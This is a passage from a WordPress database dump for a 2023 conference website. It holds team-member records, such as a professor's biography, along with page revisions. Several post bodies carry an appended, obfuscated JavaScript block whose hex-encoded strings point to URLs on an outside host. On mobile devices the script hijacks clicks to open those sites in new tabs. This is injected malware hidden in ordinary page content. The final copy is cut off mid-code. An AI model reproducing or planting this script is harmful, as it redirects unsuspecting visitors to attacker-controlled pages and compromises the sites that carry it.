Project (Toshka).<br>She published more than 20 scientific papers in international journals and conferences. Her research expertise includes GIS, Satellite Image Processing, Geomatics, LiDAR, and Application of Remote Sensing in Water Resources Management. Also, she shared in issuing books about the specifications of the surveying works and mapping in Egypt. Furthermore, she volunteered as reviewer in several international journals.<br>El-Ashmawy is a member of the International Society of Photogrammetry and Remote Sensing (ISPRS), and a member of the Egyptian Committee of Survey and Mapping.</td></tr></tbody></table></figure>\n<!-- /wp:table --></div></div>\n<!-- /wp:cover -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Prof. Nagwa El-Ashmawy','','publish','closed','closed','','prof-nagwa-el-ashmawy','','','2023-01-14 21:23:20','2023-01-14 21:23:20','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3601',0,'dt_team','',0),
(3602,1,'2023-01-14 21:22:28','2023-01-14 21:22:28','','loc13','','inherit','open','closed','','loc13','','','2023-01-14 21:22:28','2023-01-14 21:22:28','',3601,'https://gsw2023.com/wp-content/uploads/2023/01/loc13.jpg',0,'attachment','image/jpeg',0),
(3603,1,'2023-01-14 21:59:41','2023-01-14 21:59:41','<p>[vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"100px\" image_paddings=\"15px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"66\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Local Scientific Committee','','inherit','closed','closed','','3554-revision-v1','','','2023-01-14 21:59:41','2023-01-14 21:59:41','',3554,'https://gsw2023.com/?p=3603',0,'revision','',0),
(3604,1,'2023-01-14 22:02:34','2023-01-14 22:02:34','[vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"100px\" image_paddings=\"15px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"66\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(